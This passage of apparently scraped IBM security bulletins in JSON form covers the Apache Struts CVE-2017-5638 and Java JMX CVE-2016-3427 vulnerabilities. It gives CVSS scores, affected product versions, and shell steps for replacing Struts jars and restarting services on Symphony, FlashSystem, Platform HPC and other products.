$EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui \n&gt; mkdir -p /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) 2.4 On each management host, unzip the struts-2.3.32-lib.zip package and copy the following files to your cluster directory: **\\- For IBM Platform Symphony 7.1.1:** \n&gt; unzip -u struts-2.3.32-lib.zip \n&gt; cd struts-2.3.32/lib/ \n&gt; cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/3.3/lib/ \n&gt; cp commons-io-2.2.jar $EGO_TOP/gui/3.3/lib/ \n&gt; cp commons-lang3-3.2.jar $EGO_TOP/gui/3.3/lib/ \n&gt; cp commons-fileupload-1.3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp commons-io-2.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp commons-lang3-3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp javassist-3.11.0.GA.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp struts2-json-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n&gt; unzip -u struts-2.3.32-lib.zip \n&gt; cd struts-2.3.32/lib/ \n&gt; cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp commons-io-2.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp commons-lang3-3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp javassist-3.11.0.GA.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp struts2-json-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n&gt; cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) 2.5 Clean up the GUI work directories on all management hosts: &gt; rm -rf $EGO_TOP/gui/work/* \n&gt; rm -rf $EGO_TOP/gui/workarea/* \n**NOTE: **If you changed the default configuration for the WLP_OUTPUT_DIR environment variable and the APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR parameter is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/webgui_hostname/gui/workarea/ directory. 2.6 Launch a web browser and clear your browser\u2019s cache. \n2.7 Start the WEBGUI service: &gt; egosh service start WEBGUI\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:45", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:45", "id": "02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "href": "https://www.ibm.com/support/pages/node/631039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T18:08:34", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and FlashSystem\u2122 900 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2. \n \nCode versions affected include supported VRMFs: \n\u00b7 1.4.0.0 \u2013 1.4.6.0 \n\u00b7 1.3.0.0 \u2013 1.3.0.7\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 &amp; \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 &amp; \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___ Fixed code VRMF .__ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_| _ __N/A_| [**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central_ _ \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-02-18T01:45:50", "id": "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "href": "https://www.ibm.com/support/pages/node/697155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:34", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics version 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF19](<http://www.ibm.com/support/docview.wss?uid=swg24043514>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:50:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:50:04", "id": "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "href": "https://www.ibm.com/support/pages/node/558271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:10", "description": "## Summary\n\nThe IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 1.7, that is used by IBM SPSS Analytic Server, contains an unspecified vulnerability related to the JMX component. The vulnerability allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX. \n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n \nIBM SPSS Analytic Server 2.0.0.0\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nSPSS Analytic Server| _2.0.0.0_| [_http://www-01.ibm.com/support/docview.wss?uid=swg24042335_](<http://www-01.ibm.com/support/docview.wss?uid=swg24042335>) \n \nYou should verify applying this fix does not cause any compatibility issue in your environment. \n \nIf you change the default setting after applying the fix, you will expose yourself to the attack described above. IBM recommends that you review your entire environment to identify other areas where you have enabled the Diffie-Hellman key-exchange protocol used in TLS and take appropriate mitigation and remediation actions. \n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T13:40:55", "type": "ibm", "title": "Security Bulletin: An unspecified JMX component vulnerability affects IBM SPSS Analytic Server (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-16T13:40:55", "id": "3B175B8B601A430DE67B3C46FDC9F27CED4587673E54755AD2690781ED1CB235", "href": "https://www.ibm.com/support/pages/node/280895", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:41", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae SDK Java\u2122 Technology Edition, Version 6 that is used by Rational Insight. The issue was disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRational Insight 1.1, 1.1.1, 1.1.1.1 and 1.1.1.2| Cognos BI 10.1.1 \nRational Insight 1.1.1.3| Cognos BI 10.2.1 \nRational Insight 1.1.1.4, 1.1.1.5 and 1.1.1.6| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \nRational Insight 1.1.1.7| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 6.0 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of Rational Insight. \n \n**Rational Insight 1.1 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 19 (Implemented by file 10.1.6306.509)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>). \nReview technote [1679272: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Insight 1.1](<http://www-01.ibm.com/support/docview.wss?uid=swg21679272>) for detailed instructions.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1, 1.1.1.1 and 1.1.1.2 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 19 (Implemented by file 10.1.6306.509)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>). \nRead technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.3 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 17 (Implemented by file 10.2.5000.528)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.4 and 1.1.1.5 and 1.1.1.6 and 1.1.1.7 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: A security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21983302>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 16 (Implemented by file 10.2.5010.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T05:13:33", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java SDK affects Rational Insight (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-17T05:13:33", "id": "45B8083C191232F81D36077A9DB997569CBCDF51915A12038301F1630F4EE215", "href": "https://www.ibm.com/support/pages/node/279265", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:21", "description": "## Summary\n\nAn Apache Struts vulnerability of arbitrary code execution was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) **DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. CVSS Base Score: 7.3 CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\n_&lt;Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_Platform Cluster Manager Standard Edition_| _4.1.0, 4.1.1, 4.1.1.1, 4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform Cluster Manager Advanced Edition_| _4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform HPC_| _4.1.1, 4.1.1.1, 4.2.0, 4.2.1_| _None_| _See workaround_ \n_Spectrum Cluster Foundation_| _4.2.2_| _None_| _See workaround_ \n \n## Workarounds and Mitigations\n\nPlatform Cluster Manager 4.2.1 &amp; Platform HPC 4.2.1 &amp; Spectrum Cluster Foundation 4.2.2 \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.32/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.2.0 4.2.0.x &amp; Platform HPC 4.2.0 4.2.0.x** \n \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n4 # mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n \n5 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.1.x &amp; Platform HPC 4.1.x** \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node \n# mkdir -p /root/backup # mv 